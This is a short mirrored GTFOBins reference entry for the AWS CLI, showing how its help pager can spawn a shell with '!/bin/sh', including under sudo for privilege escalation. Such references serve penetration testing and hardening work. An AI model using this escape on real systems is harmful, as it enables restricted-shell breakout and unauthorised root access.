1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-02-22 18:23:29 +01:00
GTFOBins.github.io/_gtfobins/aws.md

14 lines
391 B
Markdown
Raw Normal View History

---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
aws help
!/bin/sh
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo aws help
!/bin/sh
---